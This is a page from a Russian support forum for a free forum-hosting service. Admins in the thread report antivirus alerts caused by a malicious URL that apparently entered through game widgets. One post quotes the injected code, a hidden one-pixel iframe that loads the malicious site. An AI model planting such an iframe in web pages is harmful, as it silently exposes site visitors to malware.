Важная информация!
Правила форума
для обязательного прочтения!
Пожалуйста, не регистрируйтесь на этом форуме с электронными адресами mail.ru, bk.ru, inbox.ru, list.ru - вам может не прийти письмо со ссылкой активации!
Вы можете воспользоваться адресами типа yandex.ru, rambler.ru, gmail.com и т.д.
(забыл / потерял пароль)
Общий FAQ по управлению форумом
FAQ: реклама на форуме
Туториалы по разным функциям ваших форумов
Алфавитный указатель
Интересные решения для форумов
Наши видео-туториалы
Условия пользования сервисом
Ссылки на полезные ресурсы
Последние темы
» ВПНавтор Danny_Marcelo Сегодня в 07:47
» Пропала вкладка "Обработка пользователей"
автор Svet007 Вчера в 07:39
» Как найти администратора?
автор PushPayer Ноябрь 21st 2024, 00:58
» Не корректное отображение картинок
автор VENEFICA. Ноябрь 15th 2024, 14:46
» Не меняется название форума
автор Aviator Ноябрь 14th 2024, 15:40
» Дублируется ссылка на форум в боковом меню
автор Чистый сталкер Октябрь 26th 2024, 21:13
» совет админам
автор лексей2222 Октябрь 23rd 2024, 05:45
» Проблема с гугл из-за Hitskin
автор Вултур Октябрь 21st 2024, 15:43
» [решено]Редактирвоание темы
автор AlexDarkTech Октябрь 13th 2024, 08:14
» Пропали иконки редактирования - HEEELP
автор Archaea Сентябрь 23rd 2024, 18:11
вирус на форуме
+4
KillLooser
Dana Domirani
Домовой
Виктория Клэйдесдаль
Участников: 8
Бесплатный форум: форум поддержки :: Взаимопомощь и Поддержка :: Разные проблемы :: [Архив] Разные проблемы
Страница 1 из 2
Страница 1 из 2 • 1, 2
вирус на форуме
после установки игр,антивирус веризжит от того что вредоносный юрл-адрес был блокирован((че делать теперь? хотела же как лучше
Re: вирус на форуме
удалите
Домовой-
-
Благодарности : 3243
Вы может быть себе в профиль поставите в вебсайт свой форум?Виктория Клэйдесдаль пишет:удалила игры,и баннеры удалились((че с форумом не пойму(((помогитеее
Домовой-
-
помогите же мне!!я у вас тут вирус спохватила!!игры установив!!!теперь что удалять форум?моя тема так и скатиться вниз..только раскрутила все сделала,по божески..ща сяду и буду плакать
да кто нибудь..что делать то скажитееее,время идет,люди ждут починки форума!!!помогите,может денег выслать?блин черте што..я жду уже сутки и ноль на массу!!у меня виииру на форусме!!!!!
Вируса на форуме у Вас нет, может быть только вредоносная ссылка.помогите же мне!!я у вас тут вирус спохватила!!игры установив!!!теперь что удалять форум?
Очень сложно представить, не видя ПА. Какие виджеты сейчас у Вас установлены на портале?
P.S. Касперский ругается не на вирус, а на ссылку (talmeris.com) - что у Вас стоит с такой ссылкой?
Где находится CSS? Па > Оформление > Цвета > Каскадная таблица стилей CSS Где искать основные шаблоны? ПА > Оформление > Шаблоны > Общие настройки Где находится раздел для подключения скриптов ПА > Модули > Управление кодами Javascript |
ниче не стоит..блин есть второй админ..может он че установил...где искать это?пожалуйста..помогите че хотите вам сделаююю
Раз Каспер видит, значит стоит...
Что именно пропало?на портале пропало все с удалением игр..как восстановить?
Где находится CSS? Па > Оформление > Цвета > Каскадная таблица стилей CSS Где искать основные шаблоны? ПА > Оформление > Шаблоны > Общие настройки Где находится раздел для подключения скриптов ПА > Модули > Управление кодами Javascript |
все!!!пропали новости,пропали баннерывсе что написано было и копирайт или ссылки на портале все исчезло и в па нетуууу
Из ПА исчезнуть не могло, если Вы сами не удалили виджеты или их содержимое. Дайте скриншот ПА, пожалуйста.
Сам портал есть!От туда все пропало.
KillLooser-
-
Благодарности : 5
http://talmeris.com/123/index.php если быть конкретнее
Pure-
-
Благодарности : 228
удалила все что можно,оставила шахматы,вроде не орет...буду наблюдать..но таких ссылок я не ставила...
Здравствуйте, администрация! На моем форуме (http://reiki.gip-gip.ru/), а именно на портале антивирусная программа блокирует вирусную угрозу. Каждый раз, когда я захожу на сайт. Вот что антивирус выдает:
объект: talmeris.com/123/index.php
заражение: URL: MAL
Возможно ли эту угрозу как то устранить? Заранее благодарю.
ruby пишет:Здравствуйте, администрация! На моем форуме (http://reiki.gip-gip.ru/), а именно на портале антивирусная программа блокирует вирусную угрозу. Каждый раз, когда я захожу на сайт. Вот что антивирус выдает:
у меня та же проблема,удалила полностью все винжеты форума,и перестало визжать!!!правда тепперь выдает предупреждение что при переходе на форум могут находиться трояны,вирусы,и еще чето..чего раньше не было!
Ищите его по всем виджетам и измененным шаблонам.
Не понятно зачем пихать всё это на форум?
Домовой-
-
Здравствуйте, помогите пожалуйста на мойм сайте http://www.dota-war3.com/ на главной странице такой же вирус:
И я ни где не могу найти его, помогите..
Напишите в скайп rio173rio
Или в ICQ 645562612
или тут, Спасибо за ранее!
- Спойлер:
- <iframe width="1" height="1" src="http://talmeris.com/123/index.php" style="visibility: hidden;"></iframe>
И я ни где не могу найти его, помогите..
Напишите в скайп rio173rio
Или в ICQ 645562612
или тут, Спасибо за ранее!
Страница 1 из 2 • 1, 2
Бесплатный форум: форум поддержки :: Взаимопомощь и Поддержка :: Разные проблемы :: [Архив] Разные проблемы
Страница 1 из 2
Права доступа к этому форуму: